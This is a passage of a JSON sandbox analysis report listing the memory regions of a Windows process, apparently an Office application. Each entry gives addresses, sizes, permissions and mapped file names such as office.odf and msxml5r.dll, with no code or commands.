"id": "region_150", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_151", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_152", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_156", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_157", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_158", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_160", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_161", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_162", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_163", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4071423, "entry_point": 0, "filename": null, "id": "region_167", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_170", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4919295, "entry_point": 0, "filename": null, "id": "region_176", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5074943, "entry_point": 0, "filename": null, "id": "region_178", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5119999, "entry_point": 0, "filename": null, "id": "region_179", "name": "pagefile_0x00000000004e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5111808, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5181439, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5246975, "entry_point": 0, "filename": null, "id": "region_181", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5312511, "entry_point": 0, "filename": null, "id": "region_182", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_184", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5570559, "entry_point": 0, "filename": null, "id": "region_185", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7700479, "entry_point": 0, "filename": null, "id": "region_187", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:00:22.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 8781823, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 10358783, "entry_point": 0, "filename": null, "id": "region_189", "name": "pagefile_0x0000000000860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8781824, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 10424319, "entry_point": 0, "filename": null, "id": "region_190", "name": "pagefile_0x00000000009f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10420224, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 10489855, "entry_point": 0, "filename": null, "id": "region_191", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 10555391, "entry_point": 0, "filename": null, "id": "region_192", "name": "pagefile_0x0000000000a10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10551296, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 10616832, "type": "region", "version": 1 }, "end_va": 10682367, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000000a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 10616832, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 10682368, "type": "region", "version": 1 }, "end_va": 10747903, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x0000000000a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 10682368, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10747904, "type": "region", "version": 1 }, "end_va": 31719423, "entry_point": 0, "filename": null, "id": "region_195", "name": "pagefile_0x0000000000a40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10747904, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2334720, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 34054143, "entry_point": 31719424, "filename": "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\Cultures\\OFFICE.ODF", "id": "region_196", "name": "office.odf", "norm_filename": "c:\\program files (x86)\\common files\\microsoft shared\\office12\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 31719424, "timestamp": "00:00:22.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 34078720, "type": "region", "version": 1 }, "end_va": 34992127, "entry_point": 0, "filename": null, "id": "region_197", "name": "pagefile_0x0000000002080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34078720, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 37941247, "entry_point": 34996224, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_198", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34996224, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 38010879, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 38076415, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x0000000002440000", "norm_filename": null, "region_type": "private_memory", "start_va": 38010880, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38141951, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x0000000002450000", "norm_filename": null, "region_type": "private_memory", "start_va": 38076416, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 38207487, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x0000000002460000", "norm_filename": null, "region_type": "private_memory", "start_va": 38141952, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38207488, "type": "region", "version": 1 }, "end_va": 38273023, "entry_point": 0, "filename": null, "id": "region_203", "name": "private_0x0000000002470000", "norm_filename": null, "region_type": "private_memory", "start_va": 38207488, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 38535167, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x0000000002480000", "norm_filename": null, "region_type": "private_memory", "start_va": 38273024, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38535168, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x00000000024c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38535168, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 38862847, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 38862848, "type": "region", "version": 1 }, "end_va": 48496639, "entry_point": 38862848, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_207", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 38862848, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 48496640, "type": "region", "version": 1 }, "end_va": 49020927, "entry_point": 0, "filename": null, "id": "region_208", "name": "private_0x0000000002e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 48496640, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 49020928, "type": "region", "version": 1 }, "end_va": 49029119, "entry_point": 0, "filename": null, "id": "region_209", "name": "pagefile_0x0000000002ec0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 49020928, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 49086464, "type": "region", "version": 1 }, "end_va": 49151999, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000002ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49086464, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 49152000, "type": "region", "version": 1 }, "end_va": 49156095, "entry_point": 0, "filename": null, "id": "region_211", "name": "pagefile_0x0000000002ee0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 49152000, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 49217536, "type": "region", "version": 1 }, "end_va": 49479679, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x0000000002ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49217536, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 49479680, "type": "region", "version": 1 }, "end_va": 49545215, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x0000000002f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 49479680, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 49545216, "type": "region", "version": 1 }, "end_va": 49610751, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000002f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 49545216, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49610752, "type": "region", "version": 1 }, "end_va": 50659327, "entry_point": 0, "filename": null, "id": "region_215", "name": "private_0x0000000002f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 49610752, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 50659328, "type": "region", "version": 1 }, "end_va": 50802687, "entry_point": 50659328, "filename": "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db", "id": "region_216", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db", "region_type": "memory_mapped_file", "start_va": 50659328, "timestamp": "00:00:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 94208, "start_va": 50855936, "type": "region", "version": 1 }, "end_va": 50950143, "entry_point": 50855936, "filename": "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE11\\1033\\msxml5r.dll", "id": "region_217", "name": "msxml5r.dll", "norm_filename": "c:\\program files (x86)\\common files\\microsoft shared\\office11\\1033\\msxml5r.dll", "region_type": "memory_mapped_file", "start_va": 50855936, "timestamp": "00:00:22.754", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 50987008, "type": "region", "version": 1 }, "end_va": 51052543, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x00000000030a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 50987008, "timestamp": "00:00:22.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": 